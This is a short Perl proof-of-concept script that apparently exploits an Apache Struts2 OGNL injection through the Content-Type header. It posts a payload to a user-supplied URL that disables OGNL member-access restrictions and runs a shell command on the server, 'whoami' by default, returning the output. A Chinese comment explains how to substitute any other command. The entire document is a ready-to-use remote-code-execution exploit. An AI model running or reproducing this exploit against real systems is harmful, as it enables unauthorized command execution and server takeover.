1 use LWP::UserAgent; 2 3 undef $/; 4 if(@ARGV != 1){print "Use:poc.pl http://target/index.action ";exit;} 5 my $url = shift; 6 my $ua = LWP::UserAgent->new; 7 my $req = HTTP::Request->new(POST => $url); 8 my $head = <DATA>; 9 $req->content_type($head); 10 11 my $rep = $ua->request($req); 12 print $rep->content; 13 14 15 16 #如要修改命令, 请把24行的whoami修改为相当的命令就行 17 __DATA__ 18 %{(#nike='multipart/form-data'). 19 (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). 20 (#_memberAccess?(#_memberAccess=#dm): 21 ((#container=#context['com.opensymphony.xwork2.ActionContext.container']). 22 (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). 23 (#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()). 24 (#context.setMemberAccess(#dm)))).(#cmd='whoami'). 25 (#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))). 26 (#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). 27 (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)). 28 (#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse(). 29 getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)). 30 (#ros.flush())}